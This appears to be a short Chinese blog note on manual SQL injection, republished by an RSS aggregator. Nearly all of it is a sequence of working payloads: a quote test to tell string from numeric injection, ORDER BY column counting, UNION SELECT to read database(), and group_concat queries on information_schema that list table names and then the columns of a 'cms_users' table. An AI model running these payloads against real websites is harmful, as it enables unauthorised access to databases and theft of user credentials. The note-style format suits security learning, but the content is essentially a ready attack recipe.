














加个引号可以看出来
字符:admin' and 1=1#
数字:admin and 1=1
admin' and 1=1 order by [num] #
这个字段自己试可以试出来。
admin' and 1=2 union select 1,2,3,database(),4,5 #
information_schema 数据库获得数据库所有表的名称admin' and 1=2 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database() #
admin' and 1=2 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name='cms_users' #
admin' and 1=2 union [select 语句]
此内容由惯性聚合(RSS阅读器)自动聚合整理,仅供阅读参考。 原文来自 — 版权归原作者所有。